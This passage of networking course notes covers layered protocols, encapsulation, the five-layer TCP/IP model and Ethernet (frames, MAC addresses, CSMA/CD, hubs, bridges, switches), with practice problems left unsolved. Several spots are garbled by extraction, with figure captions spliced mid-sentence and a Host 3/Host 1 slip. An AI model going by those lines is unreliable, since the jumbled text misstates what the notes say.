Figure 1. Tanenbaum’s Philosopher Analaogy. From Andrew S. Tanenbaum, Computer Networks, 4th ed., Prentice Hall,
2003
18
See: Andrew S. Tanenbaum, Computer Networks, 4th ed., Prentice Hall, 2003 (pages 28-29)
261
So… how many layers exist in this scheme? You should agree that we have three layers, which we might call the Philosopher
Layer, the Translator Layer and the Secretary Layer.
Entities at the same layer must use the same protocol, or communication will not be successful. If the translator on the left
translates messages into French while the translator on the right is expecting to receive messages in German, no deep
philosophical thoughts will be exchanged between the philosophers. If the secretary on the left sends messages by fax, but the
secretary on the right is only expecting messages by email, no philosophical thoughts will be shared.
Think about how layering helps us in this scenario. We can easily replace a layer with a different implementation that
accomplishes the same task using a different mechanism, without disturbing the other layers. For example, the two translators
might shift from Latin to Hebrew. As long as the two translators agree, the philosophers and secretaries will not be concerned
(they might not even be aware of the shift in the language protocol). Similarly, the two secretaries might agree to shift from
the fax protocol to the email protocol without even informing the translators or philosophers.
5. Encapsulation So think again… how does a layer do its job? Here's how:
 At the sending end, each layer puts a header on the message received from the layer above. The header contains
information necessary for the protocol to do its job.
 At the receiving end, each layer strips off the corresponding header and forwards the rest up to the layer above.
The application layer passes its message to the transport layer. The transport layer attaches some number of bits, shown as T
in the picture above and sends this onward to the network layer. The network layer then appends some number of bits, shown
as N in the picture above, and so on, down the protocol stack. What actually gets transmitted across the physical layer from
the source to the destination is:
Now, this arrives at the destination.
262
The destination physical layer removes the bits marked P and passes the result up to the data link layer. The data link layer
removed the bits marked D and uses these bits to implement the data link protocol. Then the result is passed to the network
layer which removes the bits marked N and uses these bits to implement the network layer protocol, and so forth.
Practice Problem 11.1
Suppose an application entity generates 1024 bytes of data. By the time this data arrives at the data link layer, 96 bytes of
header information has been added. At the data link layer, the maximum frame size is 256 bytes, 32 bytes of which are its
header. How many frames will be used? How many total bytes must be transmitted?
Solution:
III. The TCP/IP Reference Model
The model we used is Section II was not chosen randomly! This model, repeated below, is termed the TCP/IP reference model.
263
You should memorize this model! Use a mnemonic if it helps. One possibility is the West Point motto: Please Do Not Trash
Army.
1. A Five Layer Model. The model we will use is the TCP/IP reference model, which consists of five layers. We list the
layer, then describe some of the functions usually assigned to the layer.
The application layer
The application layer is concerned with general purpose facilities that involve communications:






SMTP for email
HTTP for accessing the web
FTP for file transfer
SSH and TELNET for remote log in
DNS for directory assistance
SNMP for network management
Several other functions are also conceptually placed at the application layer:
 Encoding. For example: Are we using EBCDIC or ASCII? Are we using Big Endian or Little Endian?
 Encryption
 Compression
Blocks of data at the application layer are termed messages.
The application layer uses end-to-end protocols that do not recognize the existence of an underlying network. The notion of a
networking protocol being end-to-end can be somewhat confusing, so it may be helpful to recast the notion in terms of a
different network you are familiar with: the telephone network.
Suppose you (in Annapolis) are having a phone conversation with your friend (in Florida) over the plain-old-telephone system.
Suppose you use some acronyms in your conversation. Instead of saying, United States Naval Academy you say USNA. Instead
of saying Midshipmen Regulations Manual you say MIDREGS. Instead of saying Brigade Medical Unit, you say BMU.
Instead of saying Greatest Bestest Course Ehvur you say Cyber-2. Using acronyms is a form of data compression. You are
conveying the exact same information to your friend, but you are doing this with fewer syllables.
Now, ask yourself: Does the Phone Company—the wires, the switching stations, the fiber optic cables—care if you are using
acronyms to compress your data? The answer is, of course: No. The phone company does not care, and is not even aware, of
the use of compression in your voice conversation. It only matters to the end users who are actually speaking on the telephone.
Now, let's switch back to computer networks. We mentioned that the application layer can implement compression. As with
phones, so with computers: only the end points will care, or even be aware of the fact that data is being compressed. The
underlying computer network is oblivious to this.
Consider another example: Encoding. Encoding is done at the application layer, and an encoding protocol is end-to-end: the
network is not aware of the encoding scheme. In a telephone conversation, the encoding scheme might be the language that
you and your friend converse in. The phone company's network does not care if your conversation is in English or Spanish;
this is a concern only to the end users.
So, again, the application layer protocols are end-to-end.
The transport layer
Ideally, the transport layer is responsible for the end-to-end transfer of data from a process in the source to a process at the
destination, independent of the network. Put another way, ideally the transport layer uses end-to-end protocols that do not
recognize the existence of an underlying network.
Blocks of data at the transport later are termed segments.
Some tasks of the transport layer:
 End-to-end flow control
 End-to-end error control
 End-to-end congestion control 19
 Multiplexing- sending several transport layer connections over a single network layer connection.
The phone company analogy is useful again for recognizing that the protocols at the transport layer are end-to-end. Does the
phone company's network care if the person on the receiving end says: "Slow down, I'm trying to write this down" (Flow
19
The ideal separation of layers breaks down in practice. Although congestion control algorithms are end-to-end algorithms,
they are designed to alleviate congestion in a network.
264
control)? Does the phone company's network care if the person on the receiving end says: "Let me read this back to you to
make sure I've got it" (Error control)? The answers: No and No; these are end-to-end concerns.
In the next three layers, the protocols are between adjacent entities (machine-router, router-router, router-machine)
The network layer
The network layer is concerned with transferring data across a communications network from a source computer to a destination
computer. This is the first layer that recognizes the existence of a network.
Blocks of data at the network layer are termed packets or datagrams Tasks for the network layer include:
 Routing
 Internetworking-interconnecting distinct networks that use different protocols (different addressing schemes, different
packet sizes, etc.)
The data link layer
The data link layer is concerned with transferring data across a single link connecting two nodes.
Blocks of data at the data link layer are termed frames. Tasks for the data link layer include:
 Setting frame boundaries
 Error control (to make a real link into an error-free link)
 Link flow control (to stop a fast transmitter from drowning a slow receiver)
 Control access to shared channels-the Multiple Access Problem
The physical layer
The physical layer is concerned with sending bits over a channel: i.e., the mechanical and electrical considerations. Blocks of
data at the physical layer are termed bits… so we're not really talking about blocks!
2. The Big Picture Again
 In each layer, a process on one computer communicates with a peer process on another computer using that layer's
protocol. This communication is virtual.

The layer n + 1 entity uses the services provided by layer n. Layer n + 1 only cares that layer n performs the desired
service. How layer n goes about performing the service (i.e., the implementation) is of no interest to layer n + 1.

The layer n protocol does not interpret the information passed to it by layer n + 1.

At the sending end, each layer puts a header on the message received from the layer above. The header contains
information necessary for the protocol to do its job. At the receiving end, each layer strips off the corresponding
header and forwards the rest up to the layer above. For example, the picture below focuses on the network layer, and
we can see that a segment from the transport layer (in gray) is encapsulated into a packet at the network later (by
adding the header shown in pink). This packet is then sent to the data link layer.
265
Source: Forouzan, Data Communications and Networking, 4th ed., McGraw Hill, 2007
The process will continue. The packet at the network layer will be encapsulated into a frame at the data link layer.
See PowerPoint slide "Layers" on the course website.
As we discuss the security issues in the TCP/IP Model, we must keep in mind that networks must remain useful. All ITSD
network security problems at the Naval Academy could be instantly solved by simply preventing all midshipman, faculty and
staff from using computers and computer networks! That is not a good solution. We want to be able to use our networks, but
in a safe and secure manner.
Practice Problem 11.2
You caught one of your crewmembers attempting to gamble online on one of your ship's computers. After putting him on
report, he tells you that the computer did not seem to be working. For each of the network problems below, state which layer
of the TCP/IP model the problem resides in.
(a)
Our computer cannot communicate with a website due to an error in the routing algorithm used by an intermediate node.
(b)
Our computer cannot communicate with a website because your crewmember spilled his drink on the cable adapter,
causing a short.
(c)
Our computer cannot communicate with a website due to the fact that the two users (us and them) are using different
end-to-end error control algorithms.
(d)
Our computer cannot communicate with a website because we are using the XYZ-encryption algorithm, but the website
server is using the (incompatible) ABC-decryption algorithm.
Solution:
(a)
(b)
(c)
(d)
266
Practice Problem 11.3
For the boxes below, fill in the names of the layers for the TCP/IP - 5 layer reference model and then place the appropriate
letter in the blank associated with the layer for the proper description of its services.
Layer 5
_____
______
Layer 4
_____
______
Layer 3
_____
______
Layer 2
_____
______
Layer 1
_____
______
a) Provides a definition of mechanical and electrical standards for communication system
b) Concerned with transferring packets across a communication network
c) Responsible for end to end transfer of data
d) Primary function is to format and transfer files between communication message and the user’s software
e) Frames of data are transferred across a single link
Solution:
267
268
Problems
1.
The basic unit of information sent at the application layer is termed a message. Write down the term that is used to denote
the basic unit of information sent at each of the layers listed below:
(a) transport layer
(b) network layer
(c) data link layer
(d) physical layer
2.
What is the name used for the data unit that is encapsulated within a data link frame?
3.
What is the name for the data unit that is decapsulated from a packet?
4.
A program wants to send 100 bytes of data. The application layer adds a ten byte header (resulting in a 110-byte message).
Suppose every succeeding layer also appends a ten byte header. When the resulting bits are eventually transmitted
out of the physical layer, what percentage of these bits corresponds to the program's data?
5.
State the layer of the TCP/IP reference model that is responsible for each of the following tasks:
(a) Determining the route from source to destination
(b) Handling a frame received from an adjacent computer
(c) Detecting end-to-end errors
(d) Transmitting +5 volts to denote logical 1 and -5 volts to denote logical 0
6.
7.
(a)
Suppose an application entity sends an L-byte message to its peer entity. The layers in the TCP/IP model
add a total of 58 bytes of overhead (header and trailer). What percentage of the physical layer bits
corresponds to the application message if L = 100 bytes.
(b)
Repeat part a for L = 1000 bytes.
List the layers of the TCP/IP model and select from the list below the letter that best describes the main function of
each layer.
(a) Transfers frames across a single link connecting two nodes
(b) Responsible for end-to-end flow, error, and congestion control
(c) Sends bits over a channel
(d) Processes that provide services to users such as HTTP and FTP
(e) Responsible for routing packets and internetworking
269
270
Chapter 12: Ethernet
Objectives:
(a) Define the structure of an Ethernet address.
(b) State the minimum and maximum size of an Ethernet frame.
(c) Calculate the bandwidth available to users in various network configurations.
(d) Distinguish between the capabilities and uses of a hub, a bridge and a switch.
I. Ethernet
1. Introduction. In the late 1960's and into the early 1970's, computers were stand-alone devices. A computer at, say,
Stanford, had no way of communicating with a computer at, say, the Naval Academy. Research teams (largely funded by the
DoD) began to explore methods for linking computers together, allowing them to transmit information back and forth.
A breakthrough occurred when Robert Metcalfe proposed a technique for joining computers together. At heart, the computers
were joined together by a wire allowing bits to flow between computers. The sketch below (from Metcalfe's 1976 conference
paper) shows four computers (in red) joined together by a wire (in yellow). (Note that one of the four computers is drawn to
be larger than the other three in order to show some internal details).
Metcalfe, an Electrical Engineer, called his proposal "Ethernet." His company, Xerox (yes, Xerox, the same company that said
"No Thank-you" to the first computer with a GUI that it had developed in-house three years before Apple, and the same
company that saw no future in the first computer mouse that it had developed in-house) was not interested in doing anything
with the Ethernet proposal, so Metcalfe formed his own company in 1979 and named it 3Com. 3Com went on to sell hundreds
of millions of Ethernet adapter cards as a Fortune 500 Company (3Com was purchased by HP in 2009). Network World
reported that by 2010, approximately $16 billion in Ethernet equipment had been sold per year. 20
You may be wondering: Just run a wire between the computers?…there's got to be more to it than that! There are indeed four
considerations.
 First, if one computer sends data to another, there has to be a mechanism to allow the intended recipient to know
where the block of data begins and ends. In other words, the recipient must be able to look at the collection of received
bits—called a frame—and determine where the frame begins and ends. This is called the framing problem.
 Second, in order to send a frame to a specific device, every device will need a unique address. This is the address
problem.
 Third, the receiver should be able to determine if the received frame has errors. This is called the error-control
problem.
 Fourth, we have to consider the possibility that more than one computer may place their frame on the wire at the same
time. This will cause the electrical signals to collide, and both frames will be destroyed. This is called the multiple
access problem.
Metcalfe's breakthrough proposal—Ethernet—handles these four issues. Other competing proposals to join computers together
into a local area network (Token Ring, Token Bus, ATM, FDDI) have since fizzled and died, leaving Ethernet as the only game
in town for wired local area networks.
The original Ethernet transmitted at a bit rate of 10 mega-bits per second (Mbps). In 1995, a 100 Mbps Ethernet standard was
introduced, dubbed Fast Ethernet. This was followed in 1998 by Gigabit Ethernet (with a data rate of 1 Gbps) and in 2002
20
In 1996, Steve Jobs stated that "'Xerox could have owned the entire computer industry today."
271
by a 10 Gbps standard (10-Gigabit Ethernet).
products have not yet reached the market.
A 100 Gbps Ethernet standard was recently approved (2010), but commercial
Note thatFigure
we are dealing
exclusively
transmitting
13.4
802.3 with
MAC
frame data over a single link. Stated another way and with reference to the
TCP/IP reference model: we are dealing with data link-layer concerns. Additionally, note that Ethernet is implemented in a
computer's Network Interface Card (NIC).
2. Ethernet's Solution to the Framing Problem All Ethernet variants (10 Mbps, 100 Mbps, 1 Gbps and 10 Gbps) use the
same data link frame format, shown below.
Source: Forouzan, Data Communications and Networking, McGraw Hill, 2007
The fields are:
 Preamble: The preamble is not formally part of the Ethernet frame. It is added by the physical layer. It consists of
the byte 10101010 repeated 7 times. The preamble allows the receiver to synchronize to the beginning of the
frame.

Start Frame Delimiter (SFD): The SFD is not formally part of the Ethernet frame. It is added by the physical layer.
13.7It is the single byte: 10101011 Notice that the start frame delimiter follows the same pattern of alternating ones
and zeroes as the preamble, except that it concludes with two consecutive 1's. These two consecutive 1's indicate that
synchronization is over, and the real stuff is about to start: the next item will be the destination address.

The Destination and the Source Ethernet Addresses: Much more on this to follow!

Length or Type: This field usually specifies the kind of data the frame carries (e.g.: Is the data an IP packet?). In
rare implementations, this field is used instead to serve as a Length Field, providing the number of bytes in the data
field.

Data and padding: This holds the data that was received from the network layer. The minimum size of the "Data
and Padding" field must be 46 bytes, and the maximum size of this field is 1500 bytes.

CRC: Cyclic Redundancy Code used for error detection. More on this below.
Practice Problem 12.1
What is the minimum size of an Ethernet frame? (Do not include the physical layer header in your calculation.)
Solution:
Practice Problem 12.2
What is the maximum size of an Ethernet frame? (Do not include the physical layer header in your calculation.)
Solution:
272
Practice Problem 12.3
Why would padding ever be used in the field marked Data and padding?
Solution:
So, Ethernet frames must be at least 64 bytes and are not permitted to exceed 1518 bytes. Which raises the question: Why
these size limitations?
The maximum Ethernet frame size is easy to appreciate. We limit the maximum frame to 1518 bytes for three reasons:

To prevent a single user from hogging the network. Recall the picture on page 271 that shows four users sending their
data over the same wire. Suppose you are one of those users, and you want to send a frame. With Ethernet, a user
who wants to transmit a frame first listens on the wire to make sure no one else is already transmitting. If someone
else is already transmitting, then it would make no sense for you to transmit at the same time: You would garble the
transmission in progress, and your transmission would also garble. So, you patiently wait for the wire to go idle before
you transmit. Since Ethernet users always politely wait for the shared wire to go idle before transmitting, a greedy
user who starts transmitting could keep transmitting forever, never allowing others an opportunity to transmit their
frames. To avoid this, a user is allowed to transmit at most 1518 bytes before they must stop and give other users an
opportunity to transmit their frames.

Error control. With Ethernet, if a single bit arrives in error, the entire frame is thrown away by the receiver. Since
each bit represents an opportunity for error, the fewer bits we have, the fewer opportunities for error we have.

Historical reasons. Data that arrives at the NIC must be buffered before it is sent to main memory. Although memory
is very cheap today, memory was very expensive in the 1970s and 1980s when the Ethernet standard was developed.
The minimum Ethernet frame size—64 bytes—is based on technical considerations that are far less intuitive. We mentioned
that when a host using Ethernet wants to transmit a frame, it first listens to see if anyone else is transmitting. Only if a host
senses that the medium is "quiet" does it proceed with the transmission of its frame.
But even if a host takes care to ensure that the medium is quiet, collisions can still occur! For example, suppose two hosts want
to transmit an Ethernet frame at the same time and both first listen to ensure the medium is not in use. Both stations will detect
that the medium is not in use and both will start transmitting! These sorts of collisions are unavoidable.
Since collisions are unavoidable, we want to ensure that a user can tell if his transmission was involved in a collision. When
Ethernet users start transmitting, they continue to listen to the channel to detect a collision. It is important for a user to know
if his frame was involved in a collision since any frames involved in collisions will need to be retransmitted. Thus, we need to
ensure that User-1 is still transmitting under the condition that the furthest away station (say, User-2) listens to the channel just
before User-1's frame arrives, senses it idle and starts transmitting also.
Based on the maximum allowed separation between users and the speed of light (more precisely: the speed of propagation in
the cable), it can be shown (we skip the derivation) that if the minimum frame size is set to 64 bytes (512 bits) a user will be
able to tell if it was his frame that was involved in a collision.
An
Aside
Ethernet users share access to the channel. For that reason, Ethernet is termed a Multiple
Access (MA) scheme.
In addition, Ethernet users listen to (i.e., sense) the channel before transmitting. This way
they do not start transmitting their frame while another frame transmission from some other
user is already in progress. For that reason, Ethernet is termed a Channel Sense Multiple
Access (CSMA) scheme. 21
Finally, even after an Ethernet user starts transmitting, she continues to sense the channel for collisions. Collisions can
occur if two users sense the channel idle at the same time and start transmitting. When a host detects that her frame is
colliding, she immediately stops transmitting (what's the point of continuing to transmit a frame if we already know it's
garbled?). For this reason, Ethernet is termed a Channel Sense Multiple Access with Collision Detection (CSMA/CD)
scheme.
3. Ethernet's Solution to the Address Problem
21
Since a signal in this context is carrying our data, it is referred to as a carrier signal, when we sense the channel we are
sensing to detect the presence or absence of the carrier signal. Thus, CSMA is most often called Carrier Sense Multiple Access.
273
Each Network Interface Card (NIC) is assigned a globally unique address—an Ethernet address—that is burned into the card's
Read Only Memory (ROM). ROM is non-volatile memory whose contents cannot be altered by the user. All machines on an
Ethernet LAN are guaranteed to have unique addresses. Moreover, no two hosts anywhere in the world have the same Ethernet
address.
So, when you buy a NIC (or, as is most often the case, a computer that contains a NIC), you are also buying a globally unique
Ethernet address that only you possess.
Ethernet Addresses are 6 bytes. It is important to realize that Ethernet addresses are also commonly referred to as physical
addresses, hardware addresses and Medium Access Control (MAC) addresses—these terms are all synonyms!
Practice Problem 12.4
(a) How many bits are in an Ethernet address?
(b) How many hexadecimal digits are needed to express an Ethernet address?
Solution: (a)
(b)
Ethernet addresses are usually expressed in hexadecimal notation (sometimes with colons between the bytes). For example,
an Ethernet address might be 06:01:03:02:2A:3D.
Practice Problem 12.5
Two of these 48 bits in an Ethernet address are used for special purposes. Disregarding these two bits, how many possible
Ethernet addresses exist?
Solution:
Practice Problem 12.6
If there are 7 billion people in the world, and we disperse Ethernet addresses uniformly, how many addresses are available for
each person?
Solution:
You should be convinced that we are in no danger of "running out" of Ethernet addresses!
The uniqueness of Ethernet addresses is assured by the fact that the first 3 bytes of the address are assigned to a given
manufacturer (or vendor), and this vendor must use these three bytes as the first three bytes in every NIC that the vendor
manufactures. (The Institute of Electrical and Electronics Engineers—IEEE—is the group that actually does this
assignment). For instance, all NICs manufactured by 3COM have Ethernet addresses starting with 02608C, all NICs
manufactured by Cisco have Ethernet addresses starting with 00000C, etc.
Practice Problem 12.7
How many possible Ethernet addresses exist for each individual vendor?
Solution:
Sometimes, a host may want to transmit a frame to every other user on the Ethernet LAN. A special address is reserved for
this purpose. A host may send a frame to everyone by sending the frame to the broadcast address, which is the address
consisting of all ones; i.e., a string of 48 consecutive 1’s.
Practice Problem 12.8
Express the Ethernet broadcast address in hexadecimal.
Solution:
274
Referring back to the Ethernet picture on page 271, any frame transmitted by any user arrives at the NIC of all other directly
connected users! Stated another way, the NIC receives all frames that are sent on the wire. But it only forwards some of the
frames up to the host's network layer.
Specifically, the NIC only forwards to the network layer:
 Frames addressed to its own unique address. When a frame arrives at the NIC, the NIC checks the frame to see the
destination address. If the destination address of the frame matches its NIC address, then the NIC “realizes” that this
data is intended for itself, and passes the frame to the network layer. If the destination address in the frame does not
match its NIC address, the frame is discarded.
 Frames addressed to the broadcast As mentioned, a frame sent to the broadcast address (48 ones) will be accepted by
every NIC.
 All frames if the NIC is placed in "promiscuous" mode. A vulnerability of Ethernet is the ease with which an Ethernet
card can be programmed to accept all frames, even frames addressed to other users. So, any user who sets their NIC
to promiscuous mode can examine the traffic sent by all other users.
4. Ethernet's Solution to the Error Control Problem
Recall from the picture of the Ethernet frame shown on page 272 that the last four bytes are used for the Cyclic Redundancy
Code (CRC). The CRC is used for error detection. Ethernet can only detect errors; it cannot correct errors. If a frame arrives
with errors, it is simply discarded. (Higher-layer protocols may later recognize the loss of data and take action to remedy the
problem, such as by requesting retransmission. Ethernet, though, simply discards frames containing errors without giving the
matter a second thought.)
An
Aside
Ethernet's CRC algorithm hinges on a special number that mathematicians have devised.
This number, given the name CRC-32, is special because it almost never divides evenly into
other numbers, i.e., it almost always leaves a remainder when it is divided into another
number. When the NIC crafts a frame to transmit, it fills the four byte CRC field with the
specific bits that will make the total frame (including the CRC field) perfectly divisible (with
no remainder) by CRC-32.
When this frame is received by the destination, the destination NIC divides the received frame by CRC-32. If the frame arrives
without errors, the result of the division will be zero and the frame will be accepted. If any bits were flipped en-route from
source to destination the resulting division will leave a remainder and the frame will be discarded.
5. Ethernet's Solution to the Multiple Access Problem
We have already outlined the mechanism by which Ethernet users share a channel. They listen first before transmitting (so as
not to collide with the transmissions of other users).
Suppose we have 4 users on a 10 Mbps Ethernet. The 4 users share the 10 Mbps capacity of the network. If all 4 users have a
lot to say, then each user will, on average, get to use the network ¼ of the time. As a rough approximation, we can say that
each of the 4 users will get to send at 2.5 Mbps. From each user’s perspective, they are on a 2.5 Mbps network, not a 10 Mbps
network.
Make sure you are clear on why things work this way: In Ethernet, users might share a medium, and any user’s transmission
will prevent all others on that same shared medium from transmitting. When one of the four users in our scenario above
transmit, the other three users will be prevented from transmitting because they will first sense the channel and will not
intentionally collide with another user.
We say that the four users in this example share a “collision domain.” If users have the ability to collide with each other, they
are in the same collision domain.
As a back-of-the-envelope calculation, we can say that the bandwidth 22 available to a user is given by:
BW per user =
Total BW available in the collision domain
Number of users sharing the collision domain
22
In networking, the term bandwidth has two meanings. One meaning of bandwidth is data rate, measured in bits per
second. That is the meaning which we use in this chapter. Later in this course (in the Wireless Module) we will encounter
the other meaning of the term bandwidth.
275
Figure 13.15 A network with and without a bridge
Practice Problem 12.9
What is the bandwidth available to each of the users on the 10 Mbps Ethernet shown below?
Solution:
Practice Problem 12.10
What is the bandwidth available to each of the users on the 10 Mbps Ethernet shown below?
13.25
Solution:
II. Connecting Users on an Ethernet LAN
1. Hubs Ethernet first used a bus topology with heavy garden-hose size coaxial cable. In a bus topology, all users are connected
in a straight-line configuration, as in the example on the prior page. Later, the communication medium transitioned to
unshielded twisted pair (UTP),
which
wasAnubiquitous
inconnecting
most office
Figure
1.10
isolated LAN
12 buildings.
computers to Most
a hub buildings
in a closet were set up such that UTP wires
terminated in a central electrical cabinet that served as a hub. Here, the term hub was simply meant as a “center of activity,”
the way the term is still used as in “Denver is a hub for United Airlines.” The picture below illustrates this idea.
Electrical
closet
Windows
Stray cup
of coffee
From, Forouzan, Data Communications and Networking, McGraw Hill, 2007
1.13
Now, devices called Ethernet hubs are used to connect the twisted pairs from each host together.
276
Ethernet Hub
Using the hub pictured above, we can connect four hosts together simply by plugging each host's NIC into one of the hub's four
ports.
When using a hub, we can consider the hosts to be, for practical purposes, electrically soldered together at the hub. Frames
that arrive at one port are sent out on all other ports. A frame arriving on one port is not buffered or stored—it is simply
transmitted out on all of the other ports. Fault isolation is easy with hubs—we merely have to unplug the problem host. Adding
and removing hosts is also easy—we just plug in new users and unplug hosts that we want to remove from the LAN.
It is important to note that a hub is a physical layer device. It only recognizes the existence of bits. When bits arrive on one
port, they are sent out on all of the remaining ports. A hub does not understand that some bits that arrive are Ethernet addresses
and some bits that arrive are CRC, and so forth. To a hub, everything is just bits.
Practice Problem 12.11
Consider the 10 Mbps Ethernet shared by the busy users in the network below. The network uses three 4-port hubs. How
much bandwidth is available to each user?
Figure 13.15 A network with and without a bridge
Solution:
2. Separating Collision Domains with Bridges
A bridge is similar to a hub in that it can be used to connect multiple hosts or multiple LANs. The distinction is that a bridge
will only transmit what has to be sent to the other LAN, whereas the hub will send all information.
To make this distinction clear, consider the picture below, which shows two Ethernet LANs joined together by a bridge.
1
2
3
4
5
6
9
10
11
12
13
14
Suppose Host 3 wants to send a frame to Host 5. Host 1 sends the frame out on the left LAN and it arrives at all users on that
LAN, including the bridge. The bridge will inspect the frame, and see that it is destined for Host 5. The bridge knows that
Host 5 is on the left LAN and must have already received the frame (since everyone on the left LAN received the frame). The
important point: the bridge will not forward the frame to the right-side LAN since the bridge knows that Host 5 is not on the
right-side LAN.
A bridge can be used to connect two or more Ethernet LANs like a hub, but—unlike a hub—a bridge can divide up the hosts
into separate collision domains. When a frame arrives, the bridge looks at the source and destination Ethernet addresses. The
bridge then decides whether the frame should be forwarded (and if so, to which outgoing port). Since a bridge looks at and
13.25
277
understands data link addresses, it operates at the data link layer (Layer 2). A bridge is said to be a “Layer- 2 connecting
device.”
Figure 13.15
The main advantage of bridges
over hubs iswith
improved
performance.
may want to split a single heavily loaded LAN into
A network
and
withoutWe
a bridge
separate LANs to improve performance by limiting collisions and forwarding only when we have to. Bridges have a few
ancillary advantages. Bridges enhance reliability, since a single bad user (outputting continuously) will not disable all hosts;
Hub a bridge
A network
and Additionally,
without
if bridges are used, the bad user
will only killwith
his segment.
bridges can be used to enhance security, since we can
isolate portions of the network and only forward frames where they must go.
Figure 13.15
Practice Problem 12.12
Consider users employing 10 Mbps Ethernet. How much bandwidth does each user get in each of the three scenarios below.
(a) Scenario 1:
(b) Scenario 2:
(c) Scenario 3:
13.25
13.25
Solution:
(a)
(b)
(c)
278
We should note that the results of the preceding calculations are, at best, approximations. We are presuming that a bridge port
provides as much traffic on a LAN as a typical user. For example, in the picture above, consider the top-left collision domain.
This collision domain has three users, plus the bridge port. The bridge port, however, is conveying the traffic from nine other
users (the users on the other three LANs), so it may not be the case that the bridge port contributes the same amount of traffic
in this collision domain as the other three users. Nevertheless, since bridges are often used to separate users who do not
communicate very often, assuming a bridge port acts as a typical user often yields satisfactory results.
3. Switched Ethernet Look at Scenario 3 above, which shows 12 users on a 4-port bridge. In this case the 12 users are
divided into four collision domains, with three users (and a bridge port) within each collision domain.
What would happen if we had the 12 users on a 12-port bridge? In this case each user would be in his own collision domain
(sharing it only with the bridge).
An N-port bridge that serves a number of hosts
 N is referred to as a “Layer-2 switch" or an "L-2 switch”.
Consider the scenario depicted below, which shows 7 users connected to a 9-port bridge. From here on out, whenever the
number of users is less than or equal to the number of ports (as is the case here), we will use the term Layer-2 switch, or simply
switch, instead of the term bridge.
Do collisions still occur? The answer is Yes, but only between a user and the switch. In the scenario above, all hosts can
successfully transmit at the same time since each port is now a separate collision domain.
Note that L-2 switches, like bridges, look at frame addresses, and operate at the data link layer. While many people use the
two terms interchangeably, a switch is most often used to connect individual computers, whereas bridges usually connect
LANs. Thus, in this taxonomy, with L-2 switches each computer is in its own collision domain, whereas with bridges each
connected LAN forms a collision domain.
Practice Problem 12.13
You have set up an Ethernet LAN for 10 users. For simplicity, assume the network has an efficiency of 100% and that resources
are shared equally among users. How much bandwidth is available to each user if:
(a) The 10 users are connected on a 10 Mbps Ethernet to a hub.
(b) The 10 users are connected on a 10 Mbps switched Ethernet
Solution:
(a)
(b)
Practice Problem 12.14
You want to set up an Ethernet LAN for a group of 10 offices at the Pentagon. Each office requires 2 digital telephone lines
(64 kbps each). Additionally, each office must support a peak web browsing demand of 40,000 bytes/min.
(a) What is the total bit rate demand of the LAN?
(b) Would a standard 10 Mbps Ethernet suffice?
Solution:
(a)
(b)
279
Practice Problem 12.15
Match the column on the left with the description on the right:
Network Interface Card
(a) Looks at MAC address and then forwards the frame on the correct port
Hub
(b) Copies incoming bits to all other ports
Switch
(c) Piece of equipment with a unique address that translates bits to signals and
transmits the signals on the medium.
Practice Problem 12.16
If an entire IP packet has 8096 bytes, how many Ethernet frames are required to transmit this packet?
Solution:
Practice Problem 12.17
Answer True or False to the following statements:
(a) An Ethernet address is normally expressed in decimal.
(b) An Ethernet address is burned into hardware and never changes
(c) An Ethernet address is used at the network layer to address packets.
(d) An Ethernet address, MAC address, and Hardware address are all the same thing.
(e) When I log on to different networks my Ethernet Address can change every time.
An
Aside
Fast Ethernet (1995) Fast Ethernet uses the same frame format as
“standard Ethernet”, i.e., it still uses 48-bit data link addresses and uses the
same frame fields as shown on page 314 of these notes.
Fast Ethernet is backward-compatible with standard Ethernet. And, perhaps surprisingly, it
uses the same minimum and maximum frame lengths as standard Ethernet. Also, it has the
same maximum physical length as standard Ethernet (100 meters for UTP). There is a big
difference: Fast Ethernet operates at 100 Mbps.
So…how do we raise the data rate? The details are rather technical, and have to do with the improvements in technology over
the years. The original Ethernet operates at 10 Mbps, but required a special type of signaling called Manchester encoding.
Advances in transmission media allowed for a signaling scheme that supported higher data rates. Better clock circuitry allowed
us to raise the transmission speed without worrying about loss of synchronization. Instead of using one twisted pair, we use
four twisted pairs: 1 to the switch, 1 from the switch, and 2 that are switchable to support the current direction of traffic flow.
TWISTED PAIR 1:Always to the network
TWISTED PAIR 2:Always from the network
TWISTED PAIR 3 and TWISTED PAIR 4
Can be switched from one direction to the other, to
support the current desired direction of traffic flow
Finally, 3-level signaling is used at the physical layer. Instead of sending a 0 or 1, we can send 0, -1 or +1.
280
Problems
1.
What are the advantages of dividing an Ethernet LAN with a bridge?
2.
What is the relationship between a switch and a bridge?
3.
Suppose the Ethernet data link layer receives 42 bytes of data from the network layer. How many bytes of padding must
be added to the data?
4.
What is the ratio of useful data to the entire packet for the smallest Ethernet frame?
5.
Suppose we have a standard 10 Mbps Ethernet LAN, on which the average frame size is 1000 bytes. If a noise burst of 2
msec occurs on the LAN, how many frames are destroyed?
6.
Sketch the Ethernet packet required to send the text string “Hello World” from Alice (whose MAC address is
11:22:33:44:55:66) to Bob (whose MAC address is AA:BB:CC:DD:EE:FF).
Your error correction bits are 0101 1100 1010 1010 1111 1110 1011 1101.
Assume that any padding bytes consist of all-zeroes, and that the Length/Type field is used as a Length field. You do
not need to show the bytes added by the physical layer. RECALL: ALL VALUES ARE REPRESENTED IN
HEXADECIMAL!
7.
Consider the network below, which shows four 10 Mbps LANs connected by two bridges, labeled B1 and B2. Assume
all users (labeled 1 through 7) are very chatty and equally chatty.
6
7
LAN 4
1
2
3
4
B1
LAN 1
(a)
(b)
(c)
(d)
5
B2
LAN 2
LAN 3
What is the effective data rate seen by user 4?
What is the effective data rate seen by user 5?
What is the effective data rate seen by user 6?
What is the effective data rate seen by user 6 if the two bridges are replaced with hubs?
281
8.
Two standard (10 Mbps) Ethernet topologies are illustrated in Figure 1 and Figure 2 for a network consisting of six
computers.
Figure 1
Figure 2
(a) How much bandwidth does each user get for the network topology depicted in Figure 1?
(b) How much bandwidth does each user get for the network topology depicted in Figure 2?
(c) How much bandwidth would each user get if a switch was used to connect together the six computers in my
network?
282
Security Exercise 12
Part 1. Your Ethernet Address
A computer is connected to a network by a Network Interface Card (NIC), also termed a network adapter. That is, the NIC is
the physical interface between a computer and the networking medium. The networking medium, in turn, might be a wire, a
fiber optic strand, or free space (in the case of wireless networks).
Each NIC is assigned a globally unique address burned into the card's Read Only Memory. All machines on an Ethernet LAN
are guaranteed to have unique addresses. No two Ethernet users anywhere in the world can have the same global address.
Addresses are 6 bytes, of which 46 bits are used for the unique address.
The NIC interfaces with the physical media, so this globally-unique address is often called the physical address. Since physical
devices are often termed hardware, a NIC’s unique address is also frequently referred to as a hardware address. Finally, since
